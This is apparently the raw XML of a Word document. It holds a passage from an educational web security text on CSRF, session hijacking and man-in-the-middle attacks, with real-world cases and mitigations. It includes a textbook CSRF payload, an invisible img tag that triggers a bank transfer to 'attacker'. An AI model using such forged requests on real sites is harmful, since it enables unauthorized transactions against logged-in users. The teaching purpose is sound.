          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=100</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An attacker could construct a malicious website containing the following HTML element:</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HTML</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i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>="https://bank.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>transfer.php?to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attacker&amp;amount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=100" width="0" height="0" border="0"&gt;</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If a user is currently logged into their bank account and subsequently visits the attacker's malicious website, their browser will automatically issue the GET request to the bank's server, initiating a fund transfer to the attacker's designated account. The bank's web application will process this request because it detects a valid session cookie associated with the logged-in user. Critically, the user remains unaware that this unauthorized transfer has occurred.</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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Illustrative Case: Attack on ING Direct Bank</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A real-world instance of a CSRF exploit involved ING Direct Bank. Security researchers identified a CSRF vulnerability within their online banking system that enabled attackers to initiate fund transfers without the user's explicit consent. By crafting a malicious URL that included a victim's account number and the desired transfer amount, attackers could trick authenticated users into unknowingly transferring funds to an account under their control.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Strategies for Mitigation:</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Synchronizer Token Pattern: This is widely recognized as the most effective defense against CSRF attacks. The server generates a unique, unpredictable token for each active user session. This token is then embedded within all forms and URLs that trigger state-changing operations. Upon submission of a form or clicking a link, the server verifies that the received token matches the one stored in the user's current session. Since the attacker cannot predict or obtain the value of this session-specific token, they are unable to construct a valid, forged request.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookies: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute can be added to HTTP cookies to instruct browsers to prevent them from being sent along with cross-site requests. Modern web browsers offer support for this attribute.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Custom Request Headers: For state-changing AJAX requests, you can mandate the inclusion of a custom HTTP header that is not automatically transmitted by browsers during cross-site requests. This measure forces an attacker to possess the ability to manipulate JavaScript code on the client-side to successfully exploit the vulnerability, significantly increasing the difficulty of the attack.</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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>d) Session Hijacking: Taking Control of User Sessions</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Session hijacking, also referred to as session sniffing, is an attack wherein a malicious actor gains unauthorized control over a legitimate user's active session with a web application. Once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>this control is established, the attacker can effectively impersonate the user and execute any actions that the genuine user is authorized to perform within the application.</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Operational Mechanism:</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A session represents a sequence of interactions between a user and a web application, typically identified and maintained through a unique session ID. This identifier is frequently stored as a cookie within the user's web browser. Session hijacking typically involves the attacker acquiring this sensitive session ID.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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Common Methods for Obtaining Session IDs:</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XSS: As previously detailed, an attacker can leverage Cross-Site Scripting (XSS) vulnerabilities to inject malicious JavaScript code that steals the user's session cookie directly from their browser.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Session Sniffing: If the session ID is transmitted in an unencrypted format over an insecure HTTP connection, an attacker positioned on the same network can employ a packet sniffer to intercept the network traffic and extract the session ID in plain text.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Brute-Force: If the generated session IDs exhibit predictable patterns or insufficient randomness, an attacker might attempt to guess a valid session ID through a brute-force attack.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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Illustrative Case: Compromised Yahoo Accounts</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In the past, Yahoo experienced instances of session hijacking where attackers successfully stole users' session IDs, enabling them to gain unauthorized access to their email accounts. Attackers employed various techniques, including exploiting XSS vulnerabilities present on the platform, to obtain these session identifiers. This unauthorized access allowed them to read private emails, send messages on behalf of the compromised users, and potentially access other services linked to the affected Yahoo accounts.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Strategies for Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Use HTTPS: Encrypt all communication exchanged between the user's web browser and the web server using the HTTPS protocol. This crucial measure prevents attackers from eavesdropping on network traffic and intercepting session IDs transm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>itted within the communication.</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HTTP Only and Secure Cookies: Configure session cookies with both the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Secure flags. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag prevents client-side scripts from accessing the cookie, while the Secure flag ensures that the cookie is transmitted only over secure HTTPS connections.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Strong Session IDs: Generate session identifiers that are sufficiently long, cryptographically random, and unpredictable. This significantly increases the difficulty for attackers attempting to guess or brute-force valid session IDs.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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Regenerate Session ID After Login: Upon successful user authentication, the web application should generate a new, unique session ID and invalidate the previous one. This practice effectively prevents session fixation attacks, where an attacker tricks a user into using a session ID that the attacker already possesses.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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>e) Man-in-the-Middle (MITM) Attacks: Intercepting Communication</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A Man-in-the-Middle (MITM) attack occurs when an unauthorized attacker intercepts the communication flow between two communicating parties without the knowledge of either party. The attacker can then eavesdrop on the exchanged information, modify the data in transit, or even impersonate one of the legitimate parties involved in the communication.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Operational Mechanism:</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In a typical MITM attack scenario, the attacker strategically positions themselves between the user and the target server. This positioning can occur on a shared network, such as a public Wi-Fi network, or through a compromised network device like a router. Once in position, the attacker can intercept all network traffic flowing between the user and the server.</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Common MITM Attack Scenarios:</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Wi-Fi Eavesdropping: An attacker can establish a rogue Wi-Fi access point that appears legitimate, such as a seemingly free Wi-Fi hotspot in a public location like a coffee shop. When unsuspecting users connect to this malicious network, the attacker gains the ability to intercept their network traffic.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DNS Spoofing: The attacker manipulates Domain Name System (DNS) records to redirect a user's intended web traffic to a malicious server controlled by the attacker.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SSL Stripping: This attack technique involves downgrading an initially secure HTTPS connection to an insecure HTTP connection. Once the connection is downgraded, the attacker can intercept and view the communication in plain text.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b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Illustrative Case: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Superfish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability</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In 2015, a significant security vulnerability was discovered in Lenovo laptops due to pre-installed software called "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Superfish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">." This software functioned as a MITM, intercepting encrypted web traffic and injecting its own advertising certificates into the communication stream. This created a substantial security risk, as attackers could potentially exploit these injected certificates to intercept and decrypt users' HTTPS traffic, thereby exposing sensitive personal data.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>Strategies for Mitigation:</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Use HTTPS and HSTS: Always ensure that web applications utilize HTTPS to encrypt all communication between the user's browser and the server. Implement HTTP Strict Transport Security (HSTS), a web server directive that forces web browsers to exclusively use HTTPS for a specific domain, effectively preventing SSL stripping attacks.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Strong Wi-Fi Security: Employ strong, unique passwords and robust encryption protocols (WPA3 is currently recommended) for all Wi-Fi networks. Exercise caution and avoid connecting to untrusted or public Wi-Fi networks whenever possible.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Virtual Private Network (VPN): Utilize a Virtual Private Network (VPN) to encrypt all internet traffic originating from your device, even when connected to public Wi-Fi networks. This adds an extra layer of security by creating an encrypted tunnel for your data.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DNSSEC: Domain Name System Security Extensions (DNSSEC) provide a mechanism for adding cryptographic signatures to DNS records. This helps to prevent DNS spoofing attacks by verifying the authenticity and integrity of DNS responses.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise Caution on Public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: Minimize the use of public Wi-Fi networks due to the inherent security risks associated with them. If unavoidable, consider using a VPN for added protection.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00386218" w:rsidRPr="00386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218"/>
    <w:rsid w:val="000A32B7"/>
    <w:rsid w:val="00386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E6A5C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DDBFB517-2666-4BD3-8FAB-5A3A0577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2628</Words>
  <Characters>14981</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>124</Lines>
  <Paragraphs>35</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>17574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2025-05-03T17:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-03T17:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>